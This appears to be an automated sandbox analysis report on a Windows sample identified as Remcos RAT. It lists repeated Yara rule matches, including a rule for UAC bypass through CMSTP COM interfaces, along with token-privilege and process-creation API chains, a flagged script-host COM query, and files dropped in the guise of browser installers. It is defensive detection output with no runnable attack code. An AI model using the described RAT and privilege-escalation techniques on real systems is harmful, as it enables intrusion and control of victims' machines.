              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004333BE
              Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\73722fd785394ff7.binJump to behavior
              Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004096A00_2_004096A0
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0042200C0_2_0042200C
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041A2170_2_0041A217
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004122160_2_00412216
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0042435D0_2_0042435D
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004033C00_2_004033C0
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004125E80_2_004125E8
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044663B0_2_0044663B
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004138010_2_00413801
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0042096F0_2_0042096F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004129D00_2_004129D0
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004119E30_2_004119E3
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041C9AE0_2_0041C9AE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0047EA6F0_2_0047EA6F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040FA100_2_0040FA10
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00423C810_2_00423C81
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00411E780_2_00411E78
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00442E0C0_2_00442E0C
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00420EC00_2_00420EC0
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044CF170_2_0044CF17
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0493B3F80_2_0493B3F8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004096A01_2_004096A0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0042200C1_2_0042200C
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0041A2171_2_0041A217
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004122161_2_00412216
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0042435D1_2_0042435D
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004033C01_2_004033C0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044F4301_2_0044F430
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004125E81_2_004125E8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044663B1_2_0044663B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004138011_2_00413801
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0042096F1_2_0042096F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004129D01_2_004129D0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004119E31_2_004119E3
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0041C9AE1_2_0041C9AE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0047EA6F1_2_0047EA6F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0040FA101_2_0040FA10
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044EB591_2_0044EB59
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00423C811_2_00423C81
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00411E781_2_00411E78
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00442E0C1_2_00442E0C
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00420EC01_2_00420EC0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044CF171_2_0044CF17
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00444FD21_2_00444FD2
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_04C106381_2_04C10638
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004096A03_2_004096A0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0042200C3_2_0042200C
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0041A2173_2_0041A217
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004122163_2_00412216
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0042435D3_2_0042435D
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004033C03_2_004033C0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044F4303_2_0044F430
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004125E83_2_004125E8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044663B3_2_0044663B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004138013_2_00413801
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0042096F3_2_0042096F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004129D03_2_004129D0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004119E33_2_004119E3
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0041C9AE3_2_0041C9AE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0047EA6F3_2_0047EA6F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0040FA103_2_0040FA10
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044EB593_2_0044EB59
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00423C813_2_00423C81
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00411E783_2_00411E78
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00442E0C3_2_00442E0C
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00420EC03_2_00420EC0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044CF173_2_0044CF17
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00444FD23_2_00444FD2
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_04CE66803_2_04CE6680
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04CD96405_2_04CD9640
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_0055A81012_2_0055A810
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_00537C0012_2_00537C00
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_00562D4012_2_00562D40
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005379F012_2_005379F0
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_0055EEB012_2_0055EEB0
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005592A012_2_005592A0
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005593B012_2_005593B0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_009AA81015_2_009AA810
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_00987C0015_2_00987C00
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_009879F015_2_009879F0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_009B2D4015_2_009B2D40
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_009AEEB015_2_009AEEB0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_009A92A015_2_009A92A0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_009A93B015_2_009A93B0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 18_2_04C1766818_2_04C17668
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A379F019_2_01A379F0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A62D4019_2_01A62D40
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A37C0019_2_01A37C00
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A5A81019_2_01A5A810
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A593B019_2_01A593B0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A592A019_2_01A592A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A5EEB019_2_01A5EEB0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: String function: 004115D7 appears 35 times
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: String function: 00445AE0 appears 65 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0040E710 appears 44 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00401B10 appears 50 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00408F40 appears 38 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004301F8 appears 36 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004115D7 appears 72 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00416C70 appears 78 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004181F2 appears 42 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00445AE0 appears 130 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0041341F appears 36 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00422240 appears 36 times
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
              Source: Acrobat.exe.6.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: msedgewebview2.exe.6.drStatic PE information: Number of sections : 14 > 10
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: msedge_proxy.exe0.6.drStatic PE information: Number of sections : 12 > 10
              Source: pwahelper.exe0.6.drStatic PE information: Number of sections : 12 > 10
              Source: identity_helper.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: pwahelper.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: elevation_service.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: ie_to_edge_stub.exe.6.drStatic PE information: Number of sections : 11 > 10
              Source: msedge_proxy.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: elevation_service.exe0.6.drStatic PE information: Number of sections : 12 > 10
              Source: notification_click_helper.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: firefox.exe.6.drStatic PE information: Number of sections : 11 > 10
              Source: setup.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
              Source: tyRPPK48Mk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
